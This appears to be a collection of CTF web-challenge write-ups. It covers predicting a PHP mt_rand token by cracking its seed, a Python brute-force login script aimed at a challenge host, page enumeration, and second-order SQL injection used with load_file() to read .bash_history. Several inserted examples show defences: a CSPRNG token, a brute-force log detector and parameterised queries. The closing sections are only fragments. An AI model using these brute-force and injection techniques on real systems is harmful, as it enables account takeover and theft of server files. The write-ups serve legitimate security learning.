[GWCTF 2019] A boring lottery
Opening the challenge shows this.
View the page source! Find the key page and open it!
Next comes the code audit step:
<?php
# This is not the lottery program's source code! Don't look!
header("Content-Type: text/html;charset=utf-8");
session_start();
if(!isset($_SESSION['seed'])){
    $_SESSION['seed']=rand(0,999999999);
}
mt_srand($_SESSION['seed']);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
$str_show = substr($str, 0, 10);
echo "<p id='p1'>".$str_show."</p>";
if(isset($_POST['num'])){
    if($_POST['num']===$str){
        echo "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>";
    }
    else{
        echo "<p id=flag>没抽中哦,再试试吧</p>";
    }
}
show_source("check.php");
This is PHP pseudo-random number seed cracking: mt_rand() is seeded once per session, and the page shows the first 10 of the 20 generated characters. First use a Python script to turn the 10 visible characters into the input format of the seed-cracking tool (one "min max range_min range_max" group per mt_rand() call):
str1 = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'zXGgRbXiep'  # the 10 characters shown on the page
res = ''
for i in range(len(str2)):
    for j in range(len(str1)):
        if str2[i] == str1[j]:
            # index of this character in str1, the range mt_rand() was called with is 0..61
            res += str(j) + ' ' + str(j) + ' ' + '0' + ' ' + str(len(str1) - 1) + ' '
            break
print(res)
Next, feed that output to the PHP mt_rand seed-cracking tool to recover the seed, then put the seed into the original generation loop to reproduce the full 20-character string and submit it to get the flag:
<?php
mt_srand(948663066);
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
$str='';
$len1=20;
for ( $i = 0; $i < $len1; $i++ ){
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
}
echo "<p id='p1'>".$str."</p>";
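The root cause in check.php is that the 20-character string comes from mt_rand(), a Mersenne Twister seeded once per session from rand(0, 999999999): ten visible characters are enough to find the seed and reproduce the hidden ten. The script below is an added example, not part of the original write-up, that reproduces the same property with Python's random module (also MT19937) over a deliberately tiny, constructed seed space, and puts the hardened generator next to it: the token comes from the secrets module and the comparison uses hmac.compare_digest. The PHP equivalents are random_int() for the draw and hash_equals() for the comparison. ALPHABET, weak_token, recover_hidden_part, strong_token and check_guess are names of my own.

```python
import hmac
import random
import secrets
import string
from typing import Optional

# Same 62-character set as $str_long1 in check.php
ALPHABET = string.ascii_lowercase + string.digits + string.ascii_uppercase
TOKEN_LEN = 20   # $len1 in check.php
SHOWN = 10       # characters the page reveals ($str_show)


def weak_token(seed: int, length: int = TOKEN_LEN) -> str:
    """Token from a seedable PRNG, mirroring mt_srand()/mt_rand() in check.php.
    Python's random.Random is MT19937 just like PHP's mt_rand(), so the whole
    output sequence is a pure function of the seed."""
    rng = random.Random(seed)
    return "".join(ALPHABET[rng.randrange(len(ALPHABET))] for _ in range(length))


def recover_hidden_part(visible_prefix: str, seed_space: range) -> Optional[str]:
    """Given only the published prefix, find a seed that reproduces it and return
    the full token. The seed space here is a constructed toy range; the point is
    that a seedable generator lets the visible part determine the hidden part."""
    for seed in seed_space:
        candidate = weak_token(seed)
        if candidate.startswith(visible_prefix):
            return candidate
    return None


def strong_token(length: int = TOKEN_LEN) -> str:
    """Hardened draw: secrets.choice uses the OS CSPRNG, so a prefix reveals
    nothing about the remaining characters (PHP: random_int())."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def check_guess(expected: str, guess: str) -> bool:
    """Constant-time comparison of the submitted value (PHP: hash_equals())."""
    return hmac.compare_digest(expected, guess)


if __name__ == "__main__":
    full = weak_token(4242)          # constructed seed inside the toy space
    shown = full[:SHOWN]
    print("weak token, shown part:", shown)
    print("recovered from prefix: ", recover_hidden_part(shown, range(10_000)))
    print("strong token:          ", strong_token())
```

Running it shows the weak token being reconstructed in full from its visible half, while the secrets-based token gives a prefix that carries no information about the rest; the fix is the generator, not hiding more characters.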
[网鼎杯2018]Comment
First, you have to log in before you can leave a comment. From the hint in the login box I could tell a brute force with Burp was intended, but I prefer Python, so here is my crude script:
import requests
import time

session = requests.session()
for i in range(999):
    data = {
        'username': 'zhangwei',
        'password': f'zhangwei{i}'
    }
    r = session.post('http://89a6083e-7291-41f2-b946-fc56ecd543c1.node3.buuoj.cn/login.php', data=data)
    print(i)
    time.sleep(0.2)
    if 'username or password error' not in r.text:
        print(r.text)
        print(data)
        break
This gives the password zhangwei666; log in with it.
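The loop above finds the password after hundreds of failed POSTs from one address followed by a single success, and that is exactly the shape a defender looks for. As an added example that is not part of the original write-up, the script below runs a sliding-window detector over constructed application auth-log lines (the "timestamp ip= user= result=" format is my own assumption, not the challenge's) and also marks the sources that logged in successfully after crossing the failure threshold. SAMPLE_LOG, parse_events and detect_bruteforce are names of my own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth-log lines (not from the challenge): one line per login attempt.
SAMPLE_LOG = """\
2020-05-01T10:00:00Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:01Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:02Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:03Z ip=192.0.2.9 user=alice result=fail
2020-05-01T10:00:03Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:04Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:05Z ip=10.0.0.5 user=zhangwei result=fail
2020-05-01T10:00:06Z ip=10.0.0.5 user=zhangwei result=ok
"""

# Assumed log format; lines that do not match are skipped rather than crashing the detector.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_events(lines):
    """Yield (timestamp, ip, user, result) for every well-formed line."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        yield ts, m["ip"], m["user"], m["result"]


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Count failed logins per (ip, user) inside a sliding time window.

    Returns (alerts, compromised): alerts maps (ip, user) to the time the failure
    threshold was first crossed; compromised holds the keys that logged in
    successfully after an alert, the trace a brute-force loop leaves when it
    finally hits the right password.
    """
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent failures
    alerts = {}
    compromised = set()
    for ts, ip, user, result in parse_events(lines):
        key = (ip, user)
        if result == "ok":
            if key in alerts:
                compromised.add(key)
            continue
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:      # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts, compromised


if __name__ == "__main__":
    found, owned = detect_bruteforce(SAMPLE_LOG.splitlines())
    for key, ts in found.items():
        suffix = " (login succeeded afterwards)" if key in owned else ""
        print(f"ALERT {key[0]} -> {key[1]} at {ts.isoformat()}{suffix}")
```

The threshold and window are deliberately low for the sample; in production the same logic feeds a lockout or rate limit, and the "success after alert" set is the list of accounts to force a password reset on.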
First I tested whether it was SQL injection; obviously not.
Then I tried XSS, and that actually worked, hehe. I also tried playing with the cookie and failed.
I saw something promising in the console, hahaha, but had no idea what to do with it. After reading other people's write-ups I learned that the files had to be restored from git. git log --reflog views all branch records, including commits no branch points to any more.
This is a second-order injection problem. I don't know why ordinary injection gives no echo. Once you know the database user has root privileges, the flag will not be in the database (if it were in the database, root privileges would not be needed). With those privileges SQL injection can read local files via load_file().
There is a www user, so look at its .bash_history: it stores the commands the current user has run and is easy to find.
I saw that he had deleted the .DS_Store file under /home/www/. Since the target environment is Docker, the .DS_Store file should be in /tmp/html. .DS_Store files often contain invisible characters, which can be converted to hexadecimal with the hex() function.
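The write-up names the bug class, second-order injection, without showing the code. As an added example that is not part of the original write-up and not the challenge's MySQL code, the script below uses sqlite3 to show the pattern: a username is stored safely with a bound parameter, then read back later and concatenated into a new statement, where the stored quote breaks out of the literal. The hardened version binds the value in every statement, treating data read from the database no differently from request input. MALICIOUS_NAME, setup_db, register, add_post, my_posts_vulnerable, my_posts_fixed and demo are names of my own.

```python
import sqlite3

# Constructed username containing a quote; it is stored intact and only becomes a
# problem when a later query trusts it.
MALICIOUS_NAME = "bob' OR '1'='1"


def setup_db():
    """In-memory SQLite database with constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, content TEXT);
        """
    )
    db.execute("INSERT INTO posts (author, content) VALUES (?, ?)",
               ("alice", "alice's private note"))
    return db


def register(db, username):
    """First-order use: parameter binding keeps the quote inert at insert time."""
    db.execute("INSERT INTO users (username) VALUES (?)", (username,))
    return db.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()[0]


def add_post(db, author, content):
    db.execute("INSERT INTO posts (author, content) VALUES (?, ?)", (author, content))


def my_posts_vulnerable(db, user_id):
    """Second-order use: the username comes back from the database, is treated as
    trusted, and is concatenated into a new statement."""
    (username,) = db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    sql = "SELECT content FROM posts WHERE author = '" + username + "'"
    return [row[0] for row in db.execute(sql)]


def my_posts_fixed(db, user_id):
    """Same logic, but every statement binds its value; stored data is never trusted."""
    (username,) = db.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    rows = db.execute("SELECT content FROM posts WHERE author = ?", (username,))
    return [row[0] for row in rows]


def demo():
    """Return (rows the vulnerable query leaks, rows the fixed query returns)."""
    db = setup_db()
    uid = register(db, MALICIOUS_NAME)
    add_post(db, MALICIOUS_NAME, "bob's own note")
    return my_posts_vulnerable(db, uid), my_posts_fixed(db, uid)


if __name__ == "__main__":
    leaked, correct = demo()
    print("vulnerable:", leaked)   # every user's posts
    print("fixed:     ", correct)  # only the caller's own post
```

Code review for this class of bug has to follow every column that is read back and reused in SQL, not only the request parameters; prepared statements at the insert are necessary but not sufficient.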
[BJDCTF 2nd]elementmaster
Found this after sending the request??? It is displayed in hexadecimal.
From this I guessed that it refers to chemical elements.
I found a script on the Internet, hhh:
import requests

url = 'http://86512ce4-2a07-43e0-a9f6-edabc83ec7d5.node3.buuoj.cn/'
flag = ''
# Element symbols in atomic-number order (the copied list had 'Te' twice; element 43 is 'Tc')
element = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
           'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
           'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
           'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
           'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
           'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr',
           'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
for i in element:
    r = requests.get(url + i + '.php')
    if r.status_code == 200:   # an existing <symbol>.php page contributes one piece of the answer
        flag += r.text
print(flag)
The result is And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php; visit that page to get the flag.
[MRCTF2020] Matryoshka
?b%20u%20p%20t=23333%0a
First there is a piece of encoded code that has to be decoded.
[HCTF 2018]WarmUp
CVE-2018-12613
Reference articles
The difference between git reset with and without --hard
i春秋 (iChunQiu): this article is written very well
Bypass using PHP's string-parsing feature